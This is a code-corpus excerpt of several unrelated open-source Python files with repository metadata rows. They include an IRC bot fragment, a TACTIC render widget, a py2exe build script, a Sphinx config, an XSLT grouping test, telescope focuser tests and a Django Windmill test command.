fh.setFormatter(fh_fmt)
if self.settings['debug']:
ch = logging.StreamHandler()
ch_fmt = logging.Formatter("%(levelname)-8s - %(message)s")
ch.setFormatter(ch_fmt)
ch.setLevel(logging.DEBUG)
root_logger.addHandler(ch)
fh.setLevel(logging.DEBUG)
else:
fh.setLevel(logging.INFO)
root_logger.addHandler(fh)
def _save_pid(self, pid_path):
pid = os.getpid()
with open(pid_path, 'w') as pidfile:
pidfile.write(str(pid))
def _register_command_plugins(self):
items = self.settings['command_plugins'].iteritems()
for msg_type, command_plugins in items:
self.command_plugins[msg_type] = plugins = {}
if command_plugins is None:
continue
for command_plugin in command_plugins:
split_path = command_plugin['path'].split('.')
plugin_name = split_path.pop()
module_path = '.'.join(split_path)
module = __import__('%s.%s' % (self.plugin_path, module_path))
for part in split_path:
module = getattr(module, part)
commands = tuple(command_plugin['commands'])
plugins[commands] = getattr(module, plugin_name)(self)
log.debug('Loaded plugin "%s"!' % plugin_name)
def start(self):
super(IRCBot, self).start()
return self._restart
def restart(self):
self._restart = True
self.exit(message=u'Restarting!')
def register_command_plugin(self, command, plugin):
both = self.command_plugins['BOTH']
for commands in both.iterkeys():
if command in commands:
return False
self.command_plugins['BOTH'][(command,)] = plugin(self)
return True
def unregister_command_plugin(self, command):
commands = (command,)
both = self.command_plugins['BOTH']
for cmds in both.iterkeys():
if cmds == commands:
del both[cmds]
return True
return False
def on_connect(self, connection):
pass
def on_welcome(self, connection, source, target, message):
initial_channels = self.initial_channels[connection.server]
if initial_channels:
self.join(connection, *initial_channels)
def on_initial_connect(self):
self._register_command_plugins()
def is_admin(self, server, nick):
"""Returns whether a given nick is one of the administrators of the
bot."""
return nick in self.admins[server]
def get_version(self):
"""Returns the version of the bot."""
return self.version
def process_message(self, connection, source, target, message, is_pubmsg):
"""Processes a message, determining whether it is a bot command, and
taking action if it is."""
if message and message[0] == self.command_prefix:
if message[1:2] == u' ':
command = u' '
args = message[2:].strip().split(u' ')
else:
tokens = message[1:].strip().split(u' ')
command, args = tokens[0], tokens[1:]
both = self.command_plugins['BOTH'].iteritems()
if is_pubmsg:
either = self.command_plugins['PUBMSG'].iteritems()
else:
either = self.command_plugins['PRIVMSG'].iteritems()
for commands, plugin in itertools.chain(both, either):
if command in commands:
plugin._process(connection, source, target, args)
break
def _on_msg(self, connection, source, target, message, is_pubmsg):
process = Thread(target=self.process_message,
args=(connection, source, target, message,
is_pubmsg))
process.start()
def on_privmsg(self, connection, source, target, message):
self._on_msg(connection, source, source.nick, message, False)
def on_pubmsg(self, connection, source, target, message):
self._on_msg(connection, source, target, message, True)
|
gpl-3.0
| 7,017,456,056,481,446,000
| 34.771331
| 80
| 0.539929
| false
| 4.664441
| false
| false
| false
|
Southpaw-TACTIC/TACTIC
|
src/pyasm/prod/web/render_wdg.py
|
1
|
6716
|
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = [
'RenderException',
'SObjectRenderCbk',
'RenderTableElementWdg',
'RenderSubmitInfoWdg',
]
from pyasm.common import Container, TacticException, Config, Common
from pyasm.command import Command, CommandExitException
from pyasm.command.remote_command import XmlRpcExec, TacticDispatcher
from pyasm.checkin import SnapshotBuilder
from pyasm.search import SearchType, Search
from pyasm.web import Widget, WebContainer, DivWdg
from pyasm.widget import FunctionalTableElement, SelectWdg, IconWdg, IconSubmitWdg, CheckboxWdg, BaseInputWdg, HiddenWdg, TableWdg
from pyasm.biz import Snapshot
from pyasm.prod.biz import Layer, FrameRange, RenderPolicy
from pyasm.prod.render import *
class RenderException(Exception):
pass
from pyasm.command import DatabaseAction
class SObjectRenderCbk(DatabaseAction):
'''initiates a render with properties'''
def get_title(self):
return "Render Submission"
def check(self):
web = WebContainer.get_web()
if web.get_form_value("Render") == "" and web.get_form_value("do_edit").startswith("Submit/") == "":
return False
else:
return True
def execute(self):
web = WebContainer.get_web()
search_keys = []
# discovery phase to find the sobject to be rendered. This can be
# either a snapshots or sobjects. If it is an sobject, then
# the latest snapshot will be rendered
search_type = web.get_form_value("parent_search_type")
search_id = web.get_form_value("parent_search_id")
if search_type:
search_keys = ["%s|%s" % (search_type, search_id)]
if not search_keys:
if self.sobject:
search_keys = [self.sobject.get_search_key()]
else:
search_keys = web.get_form_values("search_key")
# get the policy
policy = None
if self.sobject:
policy_code = self.sobject.get_value("policy_code")
if policy_code:
policy = RenderPolicy.get_by_code(policy_code)
# render options
options = {}
keys = web.get_form_keys()
for key in keys:
if key.startswith("edit|"):
value = web.get_form_value(key)
new_key = key.replace("edit|", "")
options[new_key] = value
# add the xmlrpc server to the package:
# WARNING: not that there is no / separating the 2 %s.
client_api_url = web.get_client_api_url()
options['client_api_url'] = client_api_url
# go through each of the search keys found from the interface
for search_key in search_keys:
# find the sobject associates with this key
if not search_key:
continue
sobject = Search.get_by_search_key(search_key)
if not sobject:
raise TacticException("Search Key [%s] does not exist" % search_key)
# if the search_keys represented a snapshot, then use this as
# the snapshot and find the parent
if sobject.get_base_search_type() == "sthpw/snapshot":
snapshot = sobject
sobject = sobject.get_sobject()
else:
# else use the latest, assuming a context (really doesn't
# make much sense????!!!???
# FIXME: will deal with this later
context = "publish"
snapshot = Snapshot.get_latest_by_sobject(sobject, context)
if not snapshot:
raise TacticException("No checkins of context '%s' exist for '%s'. Please look at the chekin history" % (context, sobject.get_code()) )
# We provide a render package with a bunch of necessary information
render_package = RenderPackage()
render_package.set_policy(policy)
render_package.set_snapshot(snapshot)
render_package.set_sobject(sobject)
render_package.set_options(options)
# submission class
submit_class = self.get_option("submit")
if not submit_class:
submit_class = Config.get_value("services", "render_submit_class", no_exception=True)
if not submit_class:
submit_class = "pyasm.prod.render.RenderSubmit"
# now we have an sobject and a snapshot, we initiate a job
submit = Common.create_from_class_path(submit_class, [render_package])
# if this is from the EditWdg for queues then use this queue
# entry instead
if self.sobject.get_base_search_type() == "sthpw/queue":
submit.set_queue(self.sobject)
submit.execute()
self.description = "Submitted: %s" % ", ".join(search_keys)
class RenderTableElementWdg(FunctionalTableElement):
'''presents a checkbox to select for each sobject and executes a render'''
def get_title(self):
WebContainer.register_cmd("pyasm.prod.web.SObjectRenderCbk")
render_button = IconSubmitWdg("Render", IconWdg.RENDER, False)
return render_button
def get_display(self):
sobject = self.get_current_sobject()
search_key = sobject.get_search_key()
div = DivWdg()
checkbox = CheckboxWdg("search_key")
checkbox.set_option("value", search_key)
div.add(checkbox)
return div
class RenderSubmitInfoWdg(BaseInputWdg):
'''presents information about the render'''
def get_display(self):
web = WebContainer.get_web()
widget = Widget()
search_type = web.get_form_value("parent_search_type")
search_id = web.get_form_value("parent_search_id")
if not search_type:
widget.add("RenderSubmitInfo: parent type not found")
return widget
hidden = HiddenWdg("parent_search_type", search_type)
widget.add(hidden)
hidden = HiddenWdg("parent_search_id", search_id)
widget.add(hidden)
sobject = Search.get_by_id(search_type, search_id)
table = TableWdg(search_type, css="embed")
table.set_show_property(False)
table.set_sobject(sobject)
table.remove_widget("render")
table.remove_widget("description")
widget.add(table)
return widget
|
epl-1.0
| 7,091,345,297,028,031,000
| 31.444444
| 156
| 0.609738
| false
| 4.053108
| false
| false
| false
|
Miserlou/Zappa
|
tests/test_app.py
|
1
|
1055
|
from zappa.asynchronous import task
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from html import escape
except ImportError:
from cgi import escape
def hello_world(environ, start_response):
parameters = parse_qs(environ.get('QUERY_STRING', ''))
if 'subject' in parameters:
subject = escape(parameters['subject'][0])
else:
subject = 'World'
start_response('200 OK', [('Content-Type', 'text/html')])
return ['''Hello {subject!s}
Hello {subject!s}!
'''.format(**{'subject': subject})]
def schedule_me():
return "Hello!"
@task
def async_me(arg1, **kwargs):
return "run async when on lambda %s%s" % (arg1, kwargs.get('foo', ''))
@task(remote_aws_lambda_function_name='test-app-dev', remote_aws_region='us-east-1')
def remote_async_me(arg1, **kwargs):
return "run async always on lambda %s%s" % (arg1, kwargs.get('foo', ''))
def callback(self):
print("this is a callback")
def prebuild_me():
print("this is a prebuild script")
|
mit
| -5,456,621,769,303,471,000
| 22.444444
| 84
| 0.651185
| false
| 3.370607
| false
| false
| false
|
awacha/cct
|
attic/gui/core/builderwidget.py
|
1
|
2464
|
import logging
from gi.repository import Gtk, Gdk, GdkPixbuf
from ...core.utils.callback import Callbacks, SignalFlags
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class BuilderWidget(Callbacks):
__signals__ = {'destroy': (SignalFlags.RUN_FIRST, None, ())}
def __init__(self, gladefile: str, mainwidget: str):
super().__init__()
self.gladefile = gladefile
self.builder = Gtk.Builder.new_from_file(gladefile)
assert isinstance(self.builder, Gtk.Builder)
self.builder.set_application(Gtk.Application.get_default())
self.widget = self.builder.get_object(mainwidget)
assert isinstance(self.widget, Gtk.Widget)
self.builder.connect_signals(self)
self._mainwidget_connections = [self.widget.connect('map', self.on_mainwidget_map),
self.widget.connect('unmap', self.on_mainwidget_unmap),
self.widget.connect('destroy', self.on_mainwidget_destroy)]
def on_mainwidget_destroy(self, widget: Gtk.Widget):
logger.debug('Destroying main widget: ' + self.gladefile)
self.emit('destroy')
logger.debug('Destroy signal emitted for BuilderWidget ' + self.gladefile)
self.cleanup()
return False
def on_mainwidget_map(self, widget: Gtk.Widget):
logger.debug('Mapping mainwidget for BuilderWidget ' + self.gladefile)
self.widget.foreach(lambda x: x.show_all())
return False
# noinspection PyMethodMayBeStatic
def on_mainwidget_unmap(self, widget: Gtk.Widget):
logger.debug('Unmapping mainwidget for BuilderWidget ' + self.gladefile)
return False
def cleanup(self):
for c in self._mainwidget_connections:
self.widget.disconnect(c)
self._mainwidget_connections = []
try:
self.widget = None
self.builder = None
except AttributeError:
pass
self.cleanup_callback_handlers()
def __del__(self):
logger.debug('Deleting a BuilderWidget.')
def on_close(self, widget, event=None):
self.widget.destroy()
def get_screenshot(self) -> GdkPixbuf.Pixbuf:
assert isinstance(self.widget, Gtk.Widget)
gdkwin = self.widget.get_window()
assert isinstance(gdkwin, Gdk.Window)
return Gdk.pixbuf_get_from_window(gdkwin, 0, 0, gdkwin.get_width(), gdkwin.get_height())
|
bsd-3-clause
| -4,639,427,528,054,207,000
| 36.907692
| 99
| 0.640016
| false
| 3.874214
| false
| false
| false
|
google-code/acromania
|
amprotocol.py
|
1
|
3608
|
# Copyright 2009 Lee Harr
#
# This file is part of Acromania.
#
# Acromania is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Acromania is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Acromania. If not, see <http://www.gnu.org/licenses/>.
from twisted.protocols import basic
from twisted.internet import reactor
later = reactor.callLater
import amgame
import amplayer
import colors
import amdb
class AM(basic.LineReceiver, amgame.CMix):
'Twisted protocol. One is created for each client connection.'
delimiter = '\n'
def connectionMade(self):
'A new connection. Send out the MOTD.'
print "Got new client!"
player = self.gameserver.join(self)
self.player = player
self.motd()
def connectionLost(self, reason):
'Client has disconnected.'
print "Lost a client!"
self.gameserver.leave(self.player)
def leave(self):
self.transport.loseConnection()
def lineReceived(self, line):
'''Called each time a new line of input is received from the client.
'''
line = line.strip()
#print "received", repr(line)
if not line:
return
elif line.startswith('/'):
self.command(line[1:], self.player)
else:
msg = '%s: %s' % (colors.white(self.player.name), line)
self.gameserver.broadcast(msg)
def change_name(self, player, name):
if not name:
player.message('Usage: /nick <new name>')
return
elif amdb.exists(name) and not player.username==name:
msg = colors.red('Name "') + colors.white(name) + colors.red('" is reserved')
player.message(msg)
player.message('Login with /login <name> <password> if that is your account.')
return
if name not in self.gameserver.game.playernames():
orig = player.name
player.name = name
broadcast = self.gameserver.broadcast
broadcast('Player "%s" is now known as "%s"' % (colors.white(orig), colors.white(name)))
else:
player.message('Name "%s" already in use.' % colors.white(name))
def motd(self):
'Message of the day.'
lines = open('MOTD').readlines()
for line in lines:
self.message(line.rstrip())
def help(self, player):
'Show HELP file.'
lines = open('HELP.sa').readlines()
for line in lines:
self.message(line.rstrip())
def rules(self, player):
'Show RULES file.'
lines = open('RULES').readlines()
for line in lines:
player.message(line.rstrip())
def simessage(self, msg=''):
'Send simple line to client. Used before player has logged in.'
self.transport.write(msg + '\r\n')
def message(self, *args, **kw):
color = kw.get('color', True)
strs = map(str, args)
msg = ' '.join(strs)
msg = msg % colors.yes
self.transport.write(msg + '\r\n')
def game_over(self, player):
player.message('Game over. Type /new to start again.')
player.message()
|
gpl-3.0
| 1,931,519,000,349,934,800
| 28.818182
| 100
| 0.613359
| false
| 4.026786
| false
| false
| false
|
matthewbauer/Reggie
|
windows_build.py
|
1
|
2846
|
from distutils.core import setup
from py2exe.build_exe import py2exe
import os, os.path, shutil, sys
upxFlag = False
if '-upx' in sys.argv:
sys.argv.remove('-upx')
upxFlag = True
dir = 'distrib/windows'
print '[[ Freezing Reggie! ]]'
print '>> Destination directory: %s' % dir
sys.argv.append('py2exe')
if os.path.isdir(dir): shutil.rmtree(dir)
os.makedirs(dir)
# exclude QtWebKit to save space, plus Python stuff we don't use
excludes = ['encodings', 'doctest', 'pdb', 'unittest', 'difflib', 'inspect',
'os2emxpath', 'posixpath', 'optpath', 'locale', 'calendar',
'threading', 'select', 'socket', 'hashlib', 'multiprocessing', 'ssl',
'PyQt4.QtWebKit', 'PyQt4.QtNetwork']
# set it up
setup(
name='Reggie! Level Editor',
version='1.0',
description='Reggie! Level Editor',
windows=[
{'script': 'reggie.py',
'icon_resources': [(0,'reggiedata/win_icon.ico')]}
],
options={'py2exe':{
'includes': ['sip', 'encodings', 'encodings.hex_codec', 'encodings.utf_8'],
'compressed': 1,
'optimize': 2,
'ascii': True,
'excludes': excludes,
'bundle_files': 3,
'dist_dir': dir
}}
)
print '>> Built frozen executable!'
# now that it's built, configure everything
os.unlink(dir + '/w9xpopen.exe') # not needed
if upxFlag:
if os.path.isfile('upx.exe'):
print '>> Found UPX, using it to compress the executables!'
files = os.listdir(dir)
upx = []
for f in files:
if f.endswith('.exe') or f.endswith('.dll') or f.endswith('.pyd'):
upx.append('"%s/%s"' % (dir,f))
os.system('upx -9 ' + ' '.join(upx))
print '>> Compression complete.'
else:
print '>> UPX not found, binaries can\'t be compressed.'
print '>> In order to build Reggie! with UPX, place the upx.exe file into '\
'this folder.'
if os.path.isdir(dir + '/reggiedata'): shutil.rmtree(dir + '/reggiedata')
if os.path.isdir(dir + '/reggieextras'): shutil.rmtree(dir + '/reggieextras')
shutil.copytree('reggiedata', dir + '/reggiedata')
shutil.copytree('reggieextras', dir + '/reggieextras')
shutil.copy('license.txt', dir)
shutil.copy('readme.txt', dir)
print '>> Attempting to copy VC++2008 libraries...'
if os.path.isdir('Microsoft.VC90.CRT'):
shutil.copytree('Microsoft.VC90.CRT', dir + '/Microsoft.VC90.CRT')
print '>> Copied libraries!'
else:
print '>> Libraries not found! The frozen executable will require the '\
'Visual C++ 2008 runtimes to be installed in order to work.'
print '>> In order to automatically include the runtimes, place the '\
'Microsoft.VC90.CRT folder into this folder.'
print '>> Reggie has been frozen to %s!' % dir
|
gpl-2.0
| 7,492,280,498,728,124,000
| 32.707317
| 84
| 0.603654
| false
| 3.317016
| false
| false
| false
|
henrykironde/deletedret
|
docs/conf.py
|
3
|
7970
|
import sys
import sphinx_rtd_theme
from retriever.lib.defaults import ENCODING
encoding = ENCODING.lower()
from retriever.lib.defaults import VERSION, COPYRIGHT
from retriever.lib.scripts import SCRIPT_LIST, reload_scripts
from retriever.lib.tools import open_fw
from retriever.lib.repository import check_for_updates
def to_str(object, object_encoding=encoding):
return str(object).encode('UTF-8').decode(encoding)
# Create the .rst file for the available datasets
datasetfile = open_fw("datasets_list.rst")
datasetfile_title = """==================
Datasets Available
==================
"""
check_for_updates()
reload_scripts()
script_list = SCRIPT_LIST()
# write the title of dataset rst file
# ref:http://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html
datasetfile.write(datasetfile_title)
# get info from the scripts using specified encoding
for script_num, script in enumerate(script_list, start=1):
reference_link = ''
if script.ref.strip():
reference_link = script.ref
elif hasattr(script, 'homepage'):
reference_link = script.homepage
elif not reference_link.strip():
if bool(script.urls.values()):
reference_link = list(script.urls.values())[0].rpartition('/')[0]
else:
reference_link = 'Not available'
title = str(script_num) + ". **{}**\n".format(to_str(script.title.strip(), encoding))
datasetfile.write(title)
datasetfile.write("-" * (len(title) - 1) + "\n\n")
# keep the gap between : {} standard as required by restructuredtext
datasetfile.write(":name: {}\n\n".format(script.name))
# Long urls can't render well, embed them in a text(home link)
if len(to_str(reference_link)) <= 85:
datasetfile.write(":reference: `{}`\n\n".format(reference_link))
else:
datasetfile.write(":reference: `{s}'s home link <{r}>`_.\n".format(
s=script.name, r=to_str(reference_link).rstrip("/")))
datasetfile.write(":citation: {}\n\n".format(to_str(script.citation, encoding)))
datasetfile.write(":description: {}\n\n".format(to_str(script.description, encoding)))
datasetfile.close()
needs_sphinx = '1.3'
# Add any Sphinx extension module names here, as strings.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.napoleon']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Data Retriever'
copyright = COPYRIGHT
version = release = VERSION
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
|
mit
| -5,806,422,816,114,753,000
| 30.88
| 90
| 0.692346
| false
| 3.740028
| false
| false
| false
|
Pikecillo/genna
|
external/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/mb_20030223.py
|
1
|
2150
|
# a pretty straightforward Muenchian grouping test
from Xml.Xslt import test_harness
sheet_1 = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" indent="yes"/>
<xsl:key name="skills-by-mark" match="skill" use="@mark"/>
<xsl:template match="skills">
<table>
<!-- process a set consisting of the first skill element for each mark -->
<xsl:for-each select="skill[count(.|key('skills-by-mark',@mark)[1])=1]">
<tr>
<td><b><xsl:value-of select="concat(@mark,' skills:')"/></b></td>
<td>
<!-- process all skill elements having the current skill's mark -->
<xsl:for-each select="key('skills-by-mark',@mark)">
<xsl:value-of select="@name"/>
<xsl:if test="position()!=last()"><br/></xsl:if>
</xsl:for-each>
</td>
</tr>
</xsl:for-each>
</table>
</xsl:template>
</xsl:stylesheet>"""
source_1 = """<skills>
<skill mark="excellent" name="excellentskill"/>
<skill mark="excellent" name="excellent skill"/>
<skill mark="good" name="goodskill"/>
<skill mark="good" name="goodskill"/>
<skill mark="basic" name="basicskill"/>
<skill mark="basic" name="basicskill"/>
<skill mark="excellent" name="excellentskill"/>
<skill mark="good" name="goodskill"/>
<skill mark="basic" name="basicskill"/>
</skills>"""
expected_1 = """<table>
<tr>
<td><b>excellent skills:</b></td>
<td>excellentskill
<br>excellent skill
<br>excellentskill
</td>
</tr>
<tr>
<td><b>good skills:</b></td>
<td>goodskill
<br>goodskill
<br>goodskill
</td>
</tr>
<tr>
<td><b>basic skills:</b></td>
<td>basicskill
<br>basicskill
<br>basicskill
</td>
</tr>
</table>"""
def Test(tester):
source = test_harness.FileInfo(string=source_1)
sheet = test_harness.FileInfo(string=sheet_1)
test_harness.XsltTest(tester, source, [sheet], expected_1,
title='ordinary Muenchian grouping with keys')
return
|
gpl-2.0
| 4,578,644,373,810,415,600
| 28.452055
| 80
| 0.583256
| false
| 3.199405
| true
| false
| false
|
AstroHuntsman/POCS
|
pocs/tests/test_focuser.py
|
1
|
4299
|
import pytest
from pocs.focuser.simulator import Focuser as SimFocuser
from pocs.focuser.birger import Focuser as BirgerFocuser
from pocs.camera.simulator import Camera
from pocs.utils.config import load_config
params = [SimFocuser, BirgerFocuser]
ids = ['simulator', 'birger']
# Ugly hack to access id inside fixture
@pytest.fixture(scope='module', params=zip(params, ids), ids=ids)
def focuser(request):
if request.param[0] == SimFocuser:
# Simulated focuser, just create one and return it
return request.param[0]()
else:
# Load the local config file and look for focuser configurations of the specified type
focuser_configs = []
local_config = load_config('pocs_local', ignore_local=True)
camera_info = local_config.get('cameras')
if camera_info:
# Local config file has a cameras section
camera_configs = camera_info.get('devices')
if camera_configs:
# Local config file camera section has a devices list
for camera_config in camera_configs:
focuser_config = camera_config.get('focuser', None)
if focuser_config and focuser_config['model'] == request.param[1]:
# Camera config has a focuser section, and it's the right type
focuser_configs.append(focuser_config)
if not focuser_configs:
pytest.skip(
"Found no {} configurations in pocs_local.yaml, skipping tests".format(
request.param[1]))
# Create and return a Focuser based on the first config
return request.param[0](**focuser_configs[0])
@pytest.fixture(scope='module')
def tolerance(focuser):
"""
Tolerance for confirming focuser has moved to the requested position. The Birger may be
1 or 2 encoder steps off.
"""
if isinstance(focuser, SimFocuser):
return 0
elif isinstance(focuser, BirgerFocuser):
return 2
def test_init(focuser):
"""
Confirm proper init & exercise some of the property getters
"""
assert focuser.is_connected
# Expect UID to be a string (or integer?) of non-zero length? Just assert its True
assert focuser.uid
def test_move_to(focuser, tolerance):
focuser.move_to(100)
assert focuser.position == pytest.approx(100, abs=tolerance)
def test_move_by(focuser, tolerance):
previous_position = focuser.position
increment = -13
focuser.move_by(increment)
assert focuser.position == pytest.approx((previous_position + increment), abs=tolerance)
def test_position_setter(focuser, tolerance):
"""
Can assign to position property as an alternative to move_to() method
"""
focuser.position = 75
assert focuser.position == pytest.approx(75, abs=tolerance)
def test_move_below_min_position(focuser, tolerance):
focuser.move_to(focuser.min_position - 100)
assert focuser.position == pytest.approx(focuser.min_position, tolerance)
def test_move_above_max_positons(focuser, tolerance):
focuser.move_to(focuser.max_position + 100)
assert focuser.position == pytest.approx(focuser.max_position, tolerance)
def test_camera_association(focuser):
"""
Test association of Focuser with Camera after initialisation (getter, setter)
"""
sim_camera_1 = Camera()
sim_camera_2 = Camera()
# Cameras in the fixture haven't been associated with a Camera yet, this should work
focuser.camera = sim_camera_1
assert focuser.camera is sim_camera_1
# Attempting to associate with a second Camera should fail, though.
focuser.camera = sim_camera_2
assert focuser.camera is sim_camera_1
def test_camera_init():
"""
Test focuser init via Camera constructor/
"""
sim_camera = Camera(focuser={'model': 'simulator', 'focus_port': '/dev/ttyFAKE'})
assert isinstance(sim_camera.focuser, SimFocuser)
assert sim_camera.focuser.is_connected
assert sim_camera.focuser.uid
assert sim_camera.focuser.camera is sim_camera
def test_camera_association_on_init():
"""
Test association of Focuser with Camera during Focuser init
"""
sim_camera = Camera()
focuser = SimFocuser(camera=sim_camera)
assert focuser.camera is sim_camera
|
mit
| -8,882,572,169,062,581,000
| 33.392
| 94
| 0.676902
| false
| 3.66184
| true
| false
| false
|
windmill/windmill
|
windmill/management/commands/test_windmill.py
|
1
|
4314
|
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.core.management.base import BaseCommand
from windmill.authoring import djangotest
import sys, os
from time import sleep
import types
import logging
class ServerContainer(object):
start_test_server = djangotest.start_test_server
stop_test_server = djangotest.stop_test_server
def attempt_import(name, suffix):
try:
mod = __import__(name+'.'+suffix)
except ImportError:
mod = None
if mod is not None:
s = name.split('.')
mod = __import__(s.pop(0))
for x in s+[suffix]:
mod = getattr(mod, x)
return mod
class Command(BaseCommand):
help = "Run windmill tests. Specify a browser, if one is not passed Firefox will be used"
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
from windmill.conf import global_settings
from windmill.authoring.djangotest import WindmillDjangoUnitTest
if 'ie' in labels:
global_settings.START_IE = True
sys.argv.remove('ie')
elif 'safari' in labels:
global_settings.START_SAFARI = True
sys.argv.remove('safari')
elif 'chrome' in labels:
global_settings.START_CHROME = True
sys.argv.remove('chrome')
else:
global_settings.START_FIREFOX = True
if 'firefox' in labels:
sys.argv.remove('firefox')
if 'manage.py' in sys.argv:
sys.argv.remove('manage.py')
if 'test_windmill' in sys.argv:
sys.argv.remove('test_windmill')
server_container = ServerContainer()
server_container.start_test_server()
global_settings.TEST_URL = 'http://127.0.0.1:%d' % server_container.server_thread.port
# import windmill
# windmill.stdout, windmill.stdin = sys.stdout, sys.stdin
from windmill.authoring import setup_module, teardown_module
from django.conf import settings
tests = []
for name in settings.INSTALLED_APPS:
for suffix in ['tests', 'wmtests', 'windmilltests']:
x = attempt_import(name, suffix)
if x is not None: tests.append((suffix,x,));
wmtests = []
for (ttype, mod,) in tests:
if ttype == 'tests':
for ucls in [getattr(mod, x) for x in dir(mod)
if ( type(getattr(mod, x, None)) in (types.ClassType,
types.TypeType) ) and
issubclass(getattr(mod, x), WindmillDjangoUnitTest)
]:
wmtests.append(ucls.test_dir)
else:
if mod.__file__.endswith('__init__.py') or mod.__file__.endswith('__init__.pyc'):
wmtests.append(os.path.join(*os.path.split(os.path.abspath(mod.__file__))[:-1]))
else:
wmtests.append(os.path.abspath(mod.__file__))
if len(wmtests) is 0:
print 'Sorry, no windmill tests found.'
else:
testtotals = {}
x = logging.getLogger()
x.setLevel(0)
from windmill.dep import functest
bin = functest.bin
runner = functest.runner
runner.CLIRunner.final = classmethod(lambda self, totals: testtotals.update(totals) )
setup_module(tests[0][1])
sys.argv = sys.argv + wmtests
bin.cli()
teardown_module(tests[0][1])
if testtotals['fail'] is not 0:
sleep(.5)
sys.exit(1)
|
apache-2.0
| 8,694,265,997,949,678,000
| 36.513043
| 100
| 0.572323
| false
| 4.046904
